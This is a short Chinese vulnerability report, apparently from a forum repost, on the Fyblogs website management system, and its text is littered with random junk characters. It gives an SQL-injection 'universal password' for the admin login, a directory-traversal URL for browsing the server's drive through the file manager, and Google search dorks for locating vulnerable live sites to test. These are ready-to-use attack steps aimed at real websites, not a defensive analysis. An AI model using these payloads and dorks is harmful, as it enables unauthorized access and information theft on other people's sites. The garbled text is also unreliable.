漏洞类型: 未授权访问/权限绕过9 d, x- I* z) F) e6 i
! T, S: z% y, w' K! p2 M简要描述:0 B+ Y' E; v( A1 b- t
4 A7 r3 H# A9 m0 OFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
/ |# T3 t% k6 b; F' }. l/ m1 w z% g
详细说明:
3 W9 T( P3 i( T
% j9 y: X% x: N/ q T后台万能密码 'or'='or'3 K2 a1 ?/ L: ^% x/ }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 P# D: O, ^, b8 Padmin/uploadfile.asp?currentFolder=/upfiles/../' _; |& ?7 A$ |8 {1 a
! \0 n- U8 s# j8 K! |" j3 v, _$ P
漏洞证明:! [4 r* w& ]# f# p$ e7 f( [
' G, O0 B" p3 R! V0 u
谷歌:inurl:type.asp?id=1 新闻中心1 {( P8 S# A J4 U0 K; L
或者 :inurl:download_ok.asp?3 S; o' ~, p3 [- ?* I
; \5 _: k, \, e可以测试: x" o2 }$ F) v1 L! I
% l, Z% i* M" |. ~, s% j
$ q1 e- U: j& }6 o* f& k |